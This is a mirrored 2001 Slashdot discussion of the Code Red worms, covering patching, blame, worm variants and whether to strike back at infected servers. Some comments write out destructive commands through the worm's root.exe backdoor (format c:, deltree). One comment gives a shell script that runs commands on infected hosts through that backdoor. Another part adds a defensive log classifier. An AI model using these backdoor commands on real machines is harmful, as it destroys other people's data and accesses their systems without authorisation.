Slashdot Mirror


Code Red III

drcrja was the first to send us this brief bit about Code Red III which is apparently faster and more vicious than its entertaining predecessors. I'm still wondering what I should do with the hundreds of IPs in my desktop's apache log trying hopelessly to overflow my buffer.


  1. Re:Bah. by austad · · Score: 5, Insightful

    How about an apache box in front of the IIS server with mod_proxy installed and set up as a reverse proxy filtering out default.ida requests?

    --
    Need Free Juniper/NetScreen Support? JuniperForum
  2. Re:It's not like they haven't announced the patch by mblase · · Score: 2, Informative
    not everyone is super connected and does know about this

    "Ignorance of the law is no excuse", nor is ignorance of your upgrade cycle.

    It's Microsoft's responsibility to do everything they can to notify Win 2000 customers and solve this problem

    As I said, they're already doing that. The problem is that too many people don't realize it's a problem they need to attend to. They think they can just install a server, run it, and forget about it.

    their design flaw, not the admins. So they need to fix it.

    What do you think the patch is for? Even Slashdotters' much-adored Apache software isn't immune to the occasional oversight. The difference is that, as yet, almost everyone who runs Apache is a responsible administrator who already knows the importance of keeping things up-to-date.

    I'm not "blaming consumers for the corporation's mistakes," as you say. I'm saying that the corporation is doing everything it can be reasonably expected to, short of directly violating the privacy of every one of its registered customers by forcing a software upgrade down their broadband throats. At some point, you have to lay the blame on the users.

  3. eEye's Scanner by slashkitty · · Score: 2
    This would be a security scanner from eEye.

    http://www.eEye.com/Retina

    --
    -- these are only opinions and they might not be mine.
  4. Why aren't these machines patched yet? by tmark · · Score: 2
    How is it that all this time after Code Red first hit the news, so many machines still remain unpatched? Are the Koreans being disproportionately affected, or is it having major impact over here too? And if the Koreans are being disproportionately affected, why? Is press coverage of the virus less prevalent over there? Could it be something as silly as Koreans not being as adept at the English language?

    And how can the Koreans as sysadmins be so bad, when Koreans in Age of Empires: The Conquerors are so good? Maybe the Persians and Turks are being hit badly by Code Red as well?

    1. Re:Why aren't these machines patched yet? by nether · · Score: 2, Interesting

      Because the patch does not fix the problem completely. Even if your server is patched, if you are redirecting URLs, the worm will be able to infect your machine. http://archives.neohapsis.com/archives/incidents/2001-08/0218.html

  5. Re:Perhaps we should reconsider... by norton_I · · Score: 2

    The funny thing is, if your ISP terminates web services to all of their clients because (say) 10% of them are infected, they come out of it clean, and can hide behind a service agreement.

    If I disable someone's web server because they are actively trying to infect my computer with a virus, I am liable for any damages, even ones they make up.

    Despite the fact that almost nobody reads, and fewer understand their ISP service agreements, if I put up a "service agreement" on my web server that says "by accessing this web server you agree that you are not infected by the code red virus. If I determine that you are, you agree that I may take any necessary actions to protect my services, including but not limited to automated installation of anti-virus software..." It doesn't count, since I can't have any expectation that someone infected by code red would ever see the agreement.

  6. Re:More information? by unitron · · Score: 2

    Actually deltree /y c: "accidentally hit the enter key instead of the \ which was to be followed by the single directory you wanted to delete" works quite well at wiping the entire C drive. It proceeds to do so undisturbed by any keystroke combinations intended to stop it.

    --

    I see even classic Slashdot is now pretty much unusable on dial up anymore.

  7. not in critical systems. by rebelcool · · Score: 2

    Just because their laptops have win2000 installed doesn't mean the life support is running from windows. It's not.

    --

    -

    1. Re:not in critical systems. by Syberghost · · Score: 2

      You don't have to have it in CRITICAL systems to result in loss of life; if it's feeding you faulty data and you're making decisions based on that data, you could run out of oxygen 8 hours earlier than you thought, or something similar.

      And as for the Navy, they're launching missiles with the damn thing.

  8. Versions of the worm... by Moonshadow · · Score: 5, Funny

    Code Red: A New Worm
    Code Red: Microsoft Strikes Back
    Code Red: Return of the Virii
    Code Red: The Not-so Phantom Menace

    And finally...

    Code Red: Attack of the Clones

  9. Re:Bah. by AJWM · · Score: 2

    I run a server with three virtual domains, separate logs for each. The IP numbers are sequential, but I see 1092 hits (of the XXXXX variant) on one, 584 on the second and 579 on the third.

    Whoops, make that 1094 on the first and 580 on the third -- got a couple more as I was entering this.

    --
    -- Alastair
  10. Re:Microsoft feature? by mpe · · Score: 2

    If you do a default installation of Win2k Pro it does not install the World Wide Web Publishing Service (at least in my experience). The win2k Server will install it by default.

    I wonder what IIS is considered a dependency for under W2K. Also if Office 2K can install it...

  12. Re:Why people love Code Red by SomeoneYouDontKnow · · Score: 2

    It's impossible to guard 100% against any kind of break-in. Anyone who thinks they have all the angles covered is deluding themselves. And even if you manage to get a system completely locked down, every new piece of software you install presents new opportunities for exploits.

    Yes, everyone should have backups, but that doesn't make it OK to destroy data. You say a physical break-in is different than an electronic one because there's damage in a physical break-in and not in an electronic one. How is the damage different? Suppose someone was able to hack a computer at your local power company and black out half the state? Backups won't help you there. Suppose someone launches a DoS attack against your ISP for a day, and your Internet access is rendered useless. I've been there before, and it ain't no fun. Suppose someone mailbombs you because they got pissed off with something you said on a newsgroup. I've been through that, too. Even if there's no physical damage, there's damage caused by wasted time and productivity.

    You may not want your tax dollars going to fight that. OK, fine, then make the responsible party pay restitution to cover the costs of the investigation. If he's a minor, make his parents pay. If you're worried that he won't have the money to pay, then also worry about the victims of such attacks who don't have the money to bankroll their own investigations.

    --
    That light you see at the end of the tunnel might be from an oncoming train.
  13. Re:Why people love Code Red by SomeoneYouDontKnow · · Score: 2

    Yes, the people who run poorly-patched servers bear some of the blame, but most of the blame still falls on the shoulders of the worm writer. Even if you don't lock the doors to your house, someone who walks in and steals your TV is still guilty of burglary. In the case of Code Red and its successors, the owners of the systems are becoming more and more to blame as time goes by and they don't patch, but does that excuse the worm writer? Not in the least.

    As for the 15-year-olds, I never said parents don't have responsibility. I think they do, and I also think a good many of them park their kids in front of a TV or computer, and that's wrong. But I was 15 once, and although that was before the age of the mass-marketed Internet, I knew the difference between right and wrong, and these kids do, too. If one of them breaks into a system and destroys data or defaces a Web site, what do you propose we do with him? Tell him he's been a very bad boy, and say he should never do that again? That might work for the first time and for an extremely minor infraction, but there has to be the threat of some real punishment, or the problem will never end.

    Or perhaps we should just lock the 1337 hax0r in a room with the admin of the system he trashed and let it get settled that way. In fairness to a civil society and the health of the kid, the criminal justice system would probably be a better alternative, no?

    --
    That light you see at the end of the tunnel might be from an oncoming train.
  14. Re:Viruses by Moonshadow · · Score: 2

    Yeah, but "viruses" doesn't rhyme with "jedi".

    It's called a sense of humor. Try one out some time. Geez, somebody needs a laxative...

  15. Re:It's not like they haven't announced the patch by zhensel · · Score: 2

    A couple things-
    -Microsoft didn't even update their own webservers completely - windowsupdate and hotmail were both hit by the "Hacked by Chinese" variant, so how do they expect their customers to update? Their response that the customers are at fault is ludicrous in light of this.
    -The patches issued by MS are not at all easy to apply. I've talked to people who have Windows 2000 with the latest service pack, go to the update site and are told they have to have an older service pack version to get the patch.

  16. Re:Finally by insane.idoru · · Score: 2, Funny

    I think we all know that someone is going to make the horrid decision of calling it "attack of the Code Red"...

  17. CR written by a linux zealot? by TMB · · Score: 2

    It occurs to me...

    Let's say you read /.. And let's say you're a Linux zealot. but I repeat myself. ;-)

    I've seen the sentiment expressed here before that the only way to drive into the world's consciousness that MS make shoddy products is for a massive vulnerability to hit everyone really badly. For a large number of people to lose data because of a major flaw in an MS product.

    Now I see speculation of CR IV (or whatever number version you want to call it) that collects IP addresses of CR II compromised machines from all attempts on its own machine and uses the root script to run "format c:" on each of them. It doesn't exist yet... but will it? I'm sure. Probably even before CRI goes dormant next weekend.

    This looks suspiciously like what an unscrupulous /. Linux zealot might wish for in their wildest dreams. I don't necessarily think the original CR was written by one, but I wouldn't be surprised if the more virulent strains were/are/will be.

    If you're reading this and you're thinking about this is a suggestion, please don't. Lost or corrupt data is a scourge. The tech industry is having enough problems right now as it is without needing to deal with massive data loss. MS's PR so far has been doing an admirable job of damage control, but the last few mainstream articles I've read have stopped referring to it as an Internet problem and started referring to it as an IIS problem. Sufficient damage has already been done to MS. Don't make the situation any worse.

    [TMB]

  18. Legal the same way as ShareSniffer, perhaps? by Myself · · Score: 2

    Read this if you're not familiar with ShareSniffer

    Essentially, they say that since people enable drive sharing manually, an open share holds the same legality as a clickthrough license: You wouldn't have clicked it if you didn't want to do that, so you're responsible for what happens.

    People don't install Windows by mistake. (well, that's another joke entirely) If they have services running that any reasonably competent admin would know about, they're responsible for those.

    The point of a server is to let people use it. The point of an internet connection is to make your computer part of a global network. If you're running a server on the internet, you INTEND to have it accessed by anyone who wants to.

    The worm's problem is that it's malicious, sucking up unreasonable amounts of bandwidth and denying service to others. If someone wrote a fixit worm that worked as advertised, I don't see how it could run afoul of the law. Just be careful with the bandwidth usage. Someone might call it unauthorized access, which is bullshit, access is implicitly authorized by the machine's very presence on the internet.

    IANAL!

  19. Use this tool, you can install Service Pack MAXINT by leonbrooks · · Score: 2

    The magic word is ASP2PHP. Apply this to the offending projects, kiss IIS and Windows goodbye forever. Ahhhhh! Feels so good! Won't run down your battery! Made entirely from all-Open ingredients!

    Encourage the author (Naken) and you'll soon be able to bin VB screen apps as well. Woohoo!

    --
    Got time? Spend some of it coding or testing
  20. Re:Pirate copies by CharlieG · · Score: 2

    The big problem with sending out the patch to "Registered" users is this - I'll give high odds that MOST copies of NT/Win2K running at home are pirate copies. Ditto the copies running in China - Between the 2, you are talking about the majority of the still infected boxes out there

    --
    -- 73 de KG2V For the Children - RKBA! "You are what you do when it counts" - the Masso
  21. Re:Shutting off IIS on a compromised box... by frankie · · Score: 2

    Most of the infections I've seen are on home PCs with cable modem, and the owner doesn't even know that IIS is active by default. I'd like to find a request that will switch IIS service from automatic to disabled. They'll never notice the difference, and the world will be a better place.

  22. Dynamic Updates by Tom7 · · Score: 2


    Hehe.

    I'm waiting for one which sends digitally-signed updates to hosts (like hybris did off usenet) for upgrade capabilities. From what I understand, CR2 was not directly based on CR1's code (though it's easy enough to disassemble the executable that it sends your web server...)

  23. I want Code Red IV myself... by QwkHyenA · · Score: 4, Funny
    Hopefully Code Red IV, when it rolls out next week, will just cut the dang servers OFF

    --
    LFS. Have you built your system today?
    1. Re:I want Code Red IV myself... by b1t+r0t · · Score: 2

      I'd be happy if it used an HCF instruction, or at least programmed the video chip for an extremely high resolution at 100 Hz refresh, resulting in the monitor going HCF. Another option (on soft-power ATX machines) is to shut down (but not reboot) the system. Maybe zero out the boot blocks, too. Actually just the boot blocks alone would be enough fun. Basically, something annoying that has at least a 1% chance of getting the attention of your average MCSE.

      --

      --
      "Open source is good." - Steve Jobs
      "Open source is evil." - Microsoft
    2. Re:I want Code Red IV myself... by JBowz15 · · Score: 2

      I can't wait for Code Red IV...

      I really liked the first three, and I hear that in part IV, Code Red fights the big Soviet after Apollo gets killed by him.

      Too bad Code Red part V will inevitably suck.

  24. More information? by Dr.+Evil · · Score: 5, Interesting

    I've heard all sorts of rumours about this thing. Now whenever I hear people talk about "Code Red III", I give up asking them what it is. It doesn't exist. If it does, it is about time.

    The media seems to think that Code Red 1 was July 19, Code Red 2 was Aug 1, Code Red 3 is the one with the back door. In other words, they're only figuring out now how bad Code Red II is.

    1. Re:More information? by ncc74656 · · Score: 5, Informative
      Okay. So, I'll put up a disclaimer on www.glowingplate.com that any connection attempts by machines infected with Code Red will be met with an HTTP request to $HOSTNAME/script/root.exe?+%2fc+format+c.

      Set up Lynx into a little script, log the confirmed kills to my log printer, and all is good legally because of the disclaimer. One would hope.

      That's probably a little further than the law will allow...but you could throw up a popup on infected systems. That'll let the admins on the other end know they have a problem. You can even include some simple help.

      I threw together a script a few nights ago that sends such a popup to every CodeRed2-infected server that's contacted my server. It's available at http://salfter.dyndns.org/codered.shtml if anyone's interested. I also have live log info available there...got only about two dozen hits from the original CodeRed, but CodeRed2 is at 3500 hits and climbing.

      Since the list is fairly lengthy at this point, let's see if I can sneak the script past the lameness filter:

      #!/bin/sh
      # Make sure lynx talks to the infected host directly, not through a proxy.
      http_proxy=
      # Pull the source hosts out of the apache2 MySQL log database; requestid 2058 is
      # the ID that database uses for the CodeRed2 request. The query must stay on one
      # line: a backslash-newline inside single quotes is passed to mysql literally.
      for i in `(echo use apache2 ; echo 'select host.host from transfer inner join host on host.id=transfer.hostid where requestid=2058 and transfer.time>"2001-07-31";') | mysql | sort | uniq | grep -v ^host\$`
      do
        echo -n "Sending Code Red message to $i..."
        # One ping, three-second timeout; skip hosts that don't answer.
        result=`ping -c 1 -w 3 $i | grep "100% packet loss"`
        if [ -n "$result" ]
        then
          echo "host is down."
        else
          # Use the CodeRed2 backdoor (root.exe, a copy of cmd.exe in /scripts) to run
          # "net send localhost ..." so the warning pops up on the infected server's own console.
          lynx -dump "http://$i/scripts/root.exe?/c+net+send+localhost+%22Your+web+server+has+been+infected+with+the+CodeRed2+worm.+You+have+a+security+hole+so+big+that+you+can+drive+a+Mack+truck+through+it.+You+should+fix+it+before+some+script+kiddie+comes+along+and+takes+advantage+of+it.++Remove+root.exe+and+shell.exe+from+c:%5Cinetpub%5Cscripts+(or+wherever+your+CGI+scripts+live,+though+c:%5Cinetpub%5Cscripts+is+the+default+location).%22" >/dev/null
          echo "message sent."
        fi
      done

      Damn...looks like the lameness filter didn't throttle it, but some extra spaces got thrown in. The spaces that need to be removed are fairly obvious, though.

      --
      20 January 2017: the End of an Error.
    2. Re:More information? by macdaddy · · Score: 2

      It's not offtopic if I'm answering someone's question. Damn trolls with moderator points to burn.

    3. Re:More information? by MouseR · · Score: 2

      From the report on Headline news it is faster and creates a "bigger backdoor" than Code Red II

      What the hell is a bigger backdoor?

      One's socket after being rampaged with a big stick?

      Gee, do I find reporters entertaining when they talk about things they don't know (which is about everything except reporting).

    4. Re:More information? by snake_dad · · Score: 2
      Don't forget the "echo Y" pipe trick :-)
      I don't know if that still works under NT though, fortunately no NT machine available to test it...

      --
      karma capped .sig seeking available Slashdot poster for long-term relationship.
    5. Re:More information? by helleman · · Score: 3, Informative

      Modified version to grep a standard Apache log. Change the top to be the following:

      #!/bin/sh
      for i in `grep default /var/log/httpd/access_log | cut -f1 -d- | sort | uniq`
      do

    6. Re:More information? by blakestah · · Score: 5, Funny

      In all likelihood the media is confused. It wouldn't be the first time. I figure if there's a CRv3 ever out there it won't be near as nice as v2 is. I'm thinking massive damage upon infection to the machine... but not enough to keep the worm from spreading.


      What they are calling CodeRed III is really CodeRedII with a better IP selection routine.
      Still has the XXX and installs the backdoor

      Now incidents.org is recommending that the compromised machines, which have installed backdoors, format their c drive and reinstall

      We can do it for them...

      GET /script/root.exe?+%2fc+format+c:

    7. Re:More information? by Drone-X · · Score: 2
      Don't forget the "echo Y" pipe trick :-)

      I very much doubt piping or redirecting is going to work, the system (or its equivalent) call probably won't accept that.

      What you could do is issue a "deltree /y c:\*.*". However, I had no luck with doing a "dir c:\*.*" previously so perhaps only a "deltree /y ..\..\*.*" works via root.exe.

    8. Re:More information? by pi_rules · · Score: 4, Informative

      There were/are three versions actually. Incarnations 1 and 2 had the same purpose though. CRv1a (I think that's the accepted name) had a rather dumb random number generator. CRv1b had a much more targeted random number generator. CRv1a and CRv1b were very close in code though. The code for v1b was in v1a, but wasn't activated. The author had it just jump over the not-yet-wanted portions. You can spot a CRv1 attempt because it uses N's to fill up the buffer.

      CRv2 on the other hand (which is technically the 3rd release, but the first two did almost the same thing) fills up the buffer using X's and then opens the backdoor, sets up root.exe in the scripts/ mapping, etc. Totally different codebase from what I gather.

      In all likelihood the media is confused. It wouldn't be the first time. I figure if there's a CRv3 ever out there it won't be near as nice as v2 is. I'm thinking massive damage upon infection to the machine... but not enough to keep the worm from spreading.

      Justin Buist

    9. Re:More information? by ncc74656 · · Score: 2
      maybe you should send it to more than just local host... you'd have to check on a windows box, but I think "net send /domain the server at $ip is infected by code red

      I threw IIS onto my Win2K box (it sits behind a Linux firewall and only does workstation stuff) to play with different usernames. I considered sending to Administrator, but if nobody is logged in as an admin, nobody will see the message. Also, some shops change "Administrator" to something else, in which case sending to that name will fail altogether. (I'll allow that someone with the minimal clue needed to rename the admin account probably knows well enough to keep up on patches and updates, so this might not be a common occurrence.) Your suggestion to send to /domain only works if domain-based security is in use (presumably either the domain security in NT 4 or ActiveDirectory in Win2K). Most of the shops that are having problems with CodeRed probably don't know how to set up and manage domains.

      Sending the popup to localhost, OTOH, makes reasonably sure the message gets to the server. It could be a problem if the server is stuck in a corner somewhere and nobody ever fires it up to check on it periodically.

      I let the script loose this afternoon. For some reason, it only got to 229 hosts before conking out. (My CodeRed log page lists "3689 attempts logged from 1419 hosts" as of this writing. 2142 of those are from other lvcm.com customers.) Of those, it said 172 were down. Of the 57 that were up, 22 appear to have been fixed (Lynx came back with an error, probably because root.exe is gone from the CGI directory). 35 were still infected. 35 of 57...that's three out of five machines still opened wider than the goatse.cx guy, even after a week and a half.

      --
      20 January 2017: the End of an Error.
    10. Re:More information? by Phroggy · · Score: 2, Insightful

      Code Red II doesn't give you Administrator access; root.exe usually runs with the privileges of the Internet Guest Account.

      --
      $x='S24;r)>63/* h@<5+oZ)32"5cz';$me='phroggy'x$];
      $x=~y+ -xz+\0-Tx+;print$_^chop$me for split'',$x;
    11. Re:More information? by unitron · · Score: 2

      For which command is /autotest an undocumented switch?

      --

      I see even classic Slashdot is now pretty much unusable on dial up anymore.

    12. Re:More information? by ichimunki · · Score: 2

      If we have full access via web browser to the system, can't we simply send a GET with a URL ending in a goddam "poweroff" command or at least "kill -9 IIS" or "rm -rf /IIS/"? (Note that I include only Unix commands because I have no idea what these commands would be on NT)

      --
      I do not have a signature
    13. Re:More information? by ryanr · · Score: 4, Funny

      The name Code Red came from Marc and Ryan at eEye. When the version of the original Code Red with the "improved" random number generator came out, they named the new variant CRv2, and re-named the first one CRv1. When we found the one that leaves the back doors, inside is the string "CodeRedII", which is used as an atom name. The author named that one himself.

      Other people keep referring to CodeRed III, or CodeRed3. I *think* they are all talking about CodeRed II. We have yet to verify any fourth version.

      For people who are asking in other threads here, CRv1 and CRv2 use NNNNNNNN's in their URL. CodeRed II uses XXXXXXXXXX's.

      Honestly, if we can keep PacMan, Ms. PacMan, PacMan Jr., PacLand, and SuperPacMan distinct, why not the Code Red names?

      In any case, if someone is able to translate
      this link
      That would be a huge help.
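
Added example (editor's code, not from ryanr, eEye or anyone in the thread): a small Python classifier that applies the filler rule stated above to Apache access_log lines, so the N-filled CRv1/CRv2 overflow, the X-filled CodeRedII overflow, and later root.exe/cmd.exe probes against the dropped backdoor are counted separately. It also extracts the subset of sources that sent the X-filled request, since per the thread only CodeRedII leaves root.exe behind and those are the only hosts the popup script earlier in this thread could reach. The log lines and 10.0.0.x hosts are constructed for the example.

```python
import re
from collections import Counter

# Constructed sample Apache access_log lines (not taken from the page); the
# request paths mirror the shapes discussed in the thread.
SAMPLE_LOG = """\
10.0.0.5 - - [09/Aug/2001:04:08:11 -0700] "GET /default.ida?NNNNNNNNNNNNNNNN%u9090%u6858%ucbd3 HTTP/1.0" 404 275
10.0.0.6 - - [09/Aug/2001:04:09:02 -0700] "GET /default.ida?XXXXXXXXXXXXXXXX%u9090%u6858%ucbd3 HTTP/1.0" 404 275
10.0.0.6 - - [09/Aug/2001:04:09:03 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 280
10.0.0.7 - - [09/Aug/2001:04:10:00 -0700] "GET /c/winnt/system32/cmd.exe?/c+VER HTTP/1.0" 404 290
10.0.0.8 - - [09/Aug/2001:04:11:00 -0700] "GET /index.html HTTP/1.1" 200 1043
"""

# Common/combined log format: host ident user [time] "METHOD path proto" status ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[[^\]]*\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

# The .ida overflow request is /default.ida?<filler>%u...<shellcode>.
# Per eEye's naming above: CRv1 and CRv2 fill with N, CodeRedII fills with X.
IDA_RE = re.compile(r'^/default\.ida(?:\?(?P<fill>[^%]*))?', re.I)

# CodeRedII drops root.exe (a copy of cmd.exe) into the scripts/ mapping and
# maps /c and /d to the drive roots; later probes look for these paths.
BACKDOOR_RE = re.compile(r'/(?:root|cmd)\.exe', re.I)


def classify(path):
    """Label a request path by worm family, or None for ordinary traffic."""
    m = IDA_RE.match(path)
    if m:
        fill = (m.group('fill') or '').upper()
        if fill.startswith('N'):
            return 'CodeRed v1/v2'
        if fill.startswith('X'):
            return 'CodeRedII'
        return 'default.ida (unknown filler)'
    if BACKDOOR_RE.search(path):
        return 'backdoor probe'
    return None


def parse(log_text):
    """Yield (host, path, status, label) for every line the regex understands."""
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m['host'], m['path'], int(m['status']), classify(m['path'])


def summarize(log_text):
    """Hit count per label; unlabelled (benign) lines are not counted."""
    return Counter(label for _, _, _, label in parse(log_text) if label)


def attacking_hosts(log_text):
    """Every source that sent any worm-shaped request."""
    return {host for host, _, _, label in parse(log_text) if label}


def codered2_hosts(log_text):
    """Sources that sent the X-filled overflow: only these are expected to
    answer a /scripts/root.exe request, so only these are worth notifying."""
    return {host for host, _, _, label in parse(log_text) if label == 'CodeRedII'}


if __name__ == '__main__':
    for label, n in sorted(summarize(SAMPLE_LOG).items()):
        print(f'{label:30} {n}')
    print('CodeRedII sources:', sorted(codered2_hosts(SAMPLE_LOG)))
```

Point the script at a real access_log (read the file into `log_text`) and `codered2_hosts` gives the same host list the earlier popup script pulled from its MySQL log database, without the N-filled CRv1 sources that have no backdoor to talk to.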

    14. Re:More information? by asackett · · Score: 2, Insightful
      However, I had no luck with doing a "dir c:\*.*" previously so...

      You may get 403'd several times, as the infected machines reach their limits after a while. Just keep poking at it, you'll get your directory listing. What you won't get, though, is privilege enough to shut down either IIS or the OS itself, format the drives, reboot the box, etc.

      Some folks have taken to leaving graffiti in infected machines as they find them. It's awfully tempting...

      --

      Warning: This signature may offend some viewers.

    15. Re:More information? by snake_dad · · Score: 2
      Purely hypothetical, this might work:

      "echo y|format c:"

      Theoretically this would bypass the "are you really, really, absolutely 100% sure that you want to format this drive which may cause some data loss?" question... Of course, theoretically, this only works in "english" versions of format.[com|exe|whatever].

      I, hypothetically, could have used this to scare the living shit out of some friends, by typing it on the command prompt and then hovering over the enter key, grinning mischievously. I never did, of course.

      Maybe the format command needs a "/u" parameter, but researching this is left as an educational exercise for the reader :-)

      PS: one word: .... backup! :)

      --
      karma capped .sig seeking available Slashdot poster for long-term relationship.
    16. Re:More information? by Cheeko · · Score: 2, Informative

      Actually I believe that Code Red III is the variant that CNN reported is showing up in Southeast Asia (Korea I believe). From the report on Headline news it is faster and creates a "bigger backdoor" than Code Red II. Then again until it starts to hit someplace in the US or Europe I don't think it will be really confirmed.

    17. Re:More information? by cabbey · · Score: 2

      maybe you should send it to more than just local host... you'd have to check on a windows box, but I think "net send /domain the server at $ip is infected by code red, see www.cert.org/advisories/CA-2001-23.html for details" would be more effective, especially if the server admin's bos sees it.

      and while you're at it, stop the infection from spreading: 'net stop "Internet Information Server"' ;)

    18. Re:More information? by BigBlockMopar · · Score: 2

      I threw together a script a few nights ago that sends such a popup to every CodeRed2-infected server that's contacted my server. It's available at http://salfter.dyndns.org/codered.shtml if anyone's interested. I also have live log info available there...got only about two dozen hits from the original CodeRed, but CodeRed2 is at 3500 hits and climbing.

      Very, very, very cool. Thank you for sharing it. I'm going to hack it to tail a standard Apache log file and alert the luser directly.

      --
      Fire and Meat. Yummy.
    19. Re:More information? by BigBlockMopar · · Score: 4, Funny

      We can do it for them...
      GET /script/root.exe?+%2fc+format+c:

      Okay. So, I'll put up a disclaimer on www.glowingplate.com that any connection attempts by machines infected with Code Red will be met with an HTTP request to $HOSTNAME/script/root.exe?+%2fc+format+c.

      Set up Lynx into a little script, log the confirmed kills to my log printer, and all is good legally because of the disclaimer. One would hope.

      --
      Fire and Meat. Yummy.
    20. Re:More information? by cabbey · · Score: 2

      oh yeah... I forgot about the requirements on having domain auth setup... it's already been there on every windows box I've ever used.

      Your numbers look a little better than mine, odd given that mine were all connected back within a few seconds of connecting to me.

  25. Marketing by csbruce · · Score: 2

    Code Red III which is apparently faster and more vicious than its entertaining predecessors.

    I've always suspected that Code Red was secretly made by Microsoft's Marketing department to convince users to upgrade to the very latest products (and to grab XP as soon as it becomes available). That it's taken three versions to make Code Red work well is the proof!

  26. Re:Microsoft should be sued by tcc · · Score: 2

    Why do poor bastards get sued for using a little bandwidth to participate in an interesting project while Microsoft gets away with releasing shoddy products that slow down the entire Internet?

    THERE WAS a patch AVAILABLE *BEFORE* that virus got mainstream.

    Why should microsoft get sued for having stupid users?

    It's not like Linux didn't have any opened holes ever. You have to patch your linux? people have to patch their windows. Period. This virus is spreading like flu, not BECAUSE of microsoft, but because of INCOMPETENCE and cluelessness...

    I mean, one simple patch, poof! no more problems. Why the heck do I still see my cable modem light flash like hell even after a WEEK that everyone knows about this thing?

    See? that's a *&#@*(@& good argument for microsoft to tell the people "don't install non-certified drivers" "don't install non-ms-approved software" "don't do this and that"... people need to be wiped and taken by the hand to be shown what to do. This virus is the greatest proof that the world is full of clueless people and that's why some people won't care if their OS babysits them.

    BTW, I don't like the idea of microsoft controlling everything (nor any other companies), I just say this will give them bullets to automate the patching/drivers things without your knowledge (and of course adding a couple of "justified" intrusive programs as well). Tech people always have to pay because of non-tech people, it's always been like that... just like we have to pay high insurance rates because people have abused it and gave ammo to the insurance companies to f* us.

    I'm so fucking tired of this virus.... where's the big reset switch of the internet? :)

    --
    --- Metamoderating abusive downgraders since my 300th post.
  27. Re:Microsoft should be sued by mpe · · Score: 2

    Suppose you're a regular home user. You go to the store and buy a PC with windows preinstalled. Since you get the OEM version of Windows you don't get a nice windows box, you don't even get a decent manual, all you get is a license and, if you're lucky, a CD.

    Doesn't really matter how you buy Windows, you aren't going to get even a half decent manual....

  28. Perhaps we should reconsider... by Rob+Mac+K · · Score: 3, Interesting
    I know the reaction to a suggestion that someone create a worm that "fixes" the effects of the various CR worms provoked a highly negative response, but I wonder if the right thing to do to protect against the worm (actually, against all the morons still running these unpatched servers) would be to log an "attacking" IP, then "counterattack" by executing a command on those servers to shut them down, so they'd quit trying to infect everything in sight? I mean, geez, I know it's probably ethically (and legally) wrong to exploit the back doors, even if it's just to shut down the servers, but wouldn't that be better than sitting around doing nothing? (Since the various ISPs don't seem to be doing anything other than sending out e-mail - at this point, ignorance can't be an excuse for anyone still running an unpatched server).

    Thoughts?

    1. Re:Perhaps we should reconsider... by tringstad · · Score: 2

      I know the reaction to a suggestion that someone create a worm that "fixes" the effects of the various CR worms provoked a highly negative response

      I would have agreed with you, and there was a debate about it in one of the earlier articles, but it seems that @home has no problems with that type of behavior. I found this interesting gem in my server logs last night:

      2001-08-09 04:08:11 24.0.0.203 - me.me.me.me 80 GET /c/winnt/system32/cmd.exe /c+VER 404 -

      At first I thought it was just another leet script kiddie, tap, tapping at my ports, but the originating address struck me as interesting, so I did a quick nslookup:

      Name: authorized-scan1.security.home.net
      Address: 24.0.0.203

      Authorized Scan?!? By whom?!? I don't recall the TOS mentioning anything about my ISP being authorized should they want to try rooting me...

      I calmed down, thinking maybe it was just a one time scan, to see who was infected, but it has since popped up a few more times. And what's more, they certainly don't seem to have been very effective in doing anything, as I'm still being flooded as much as before.

      (And yes, I realize this is not the exact same thing described by the parent, but it was similar, and reminded me about it, getting me fired up again.)

      -Tommy

      --
      "I got a half gallon of Jack, and 2 dozen Ant Traps. I'm about to get wild." -me
    2. Re:Perhaps we should reconsider... by norton_I · · Score: 3, Interesting

      I have been seriously considering the "counterattack" method for a while now (as opposed to a self replicating anti-virus, which I am firmly opposed to).

      I guess part of the problem is you have to install not only the patch, but a service pack, and people who seem to know something about windows think that is hard to do remotely.

      Here is another thought: Just write a counter strike that A) deletes code red and the back doors B) turns off IIS and disables it from starting at boot, and C) changes the homepage to something that says "Please install these patches, your system has been infected by Code Red."

      This is based on the assumption that 99% of the people who haven't patched their webservers don't use them and have forgotten (or never knew) IIS was installed.

    3. Re:Perhaps we should reconsider... by norton_I · · Score: 2

      Yeah, but the webserver would be off. There is no vulnerability until it is turned back on. The goal is, if someone actually uses their webserver, they will notice it is off, and when they turn it on, the first thing they will see is "you need to install this patch". If they don't use it, they will never notice it is off, and they will be immune to all further IIS worms.

  29. Re:Not SYSTEM-level access.... by baptiste · · Score: 2

    But Code Red II created virtual drives which allowed you to access cmd.exe directly via a corrupt explorer with root rights. So it had a pretty large back door to begin with - I look forward to the analysis of Code Red III if such a thing exists.

  30. Re:An ETHICAL way to Anti-Virus by nitehorse · · Score: 5, Informative

    Actually, if you add a line in your httpd.conf that looks like this:

    AddHandler cgi-script .ida

    then you can use Perl to write a quick script which will do the reverse lookup and then send that email. Or, if you want to use PHP instead, alter your AddType line for PHP to this:

    AddType application/x-httpd-php .php .php3 .ida

    Then restart apache, and throw a script named default.ida up to your DocumentRoot directory.

    -Chris

  31. Re:More info on Code Red III by Anonymous Coward · · Score: 2, Insightful

    At least give some credit!! That was originally a spoof of the goodtimes hoax.

  32. Slashdot Humor by Futurepower(tm) · · Score: 3, Offtopic

    -

    I've been making a list of the best of Slashdot humor. Here it is. In the beginning I did not record the user name:

    Lotteries are a tax on people who suck at math.

    "He that is wounded in the stones, or hath his privy member cut off, shall not enter into the congregation of the LORD." - Deuteronomy 23:1

    The metric system is the tool of the devil!! i get forty rods to the hogshead, and that's the way i likes it!!

    Someone had to put all that chaos there! by Greyfox (nride@uswest.net)

    I love vegetarians - some of my favorite foods are vegetarians.

    "Today's forecast calls for sprinkles of genius with a chance of doom!" - Stewie Griffin

    The truth does not set you free, it just makes everyone irritable.

    Which is worse: Ignorance or Apathy? Who knows? Who cares?

    It's pretty funny, actually. It all started when I thought that inflammable was the opposite of flammable...

    From a signature line at the end of every message: [Drink Coke] [Army - Be All You Can Be] [This ad space for sale! Contact the author for current rates]

    "You can't have everything. Where would you keep it?" -- Steven Wright

    A computer without a Microsoft operating system is like a dog without bricks tied to it's head. dieMSdie (steve@spam-is-bad.xtn.net)

    "Science is like sex: sometimes something useful comes out, but that is not the reason we are doing it" -- Richard Feynman

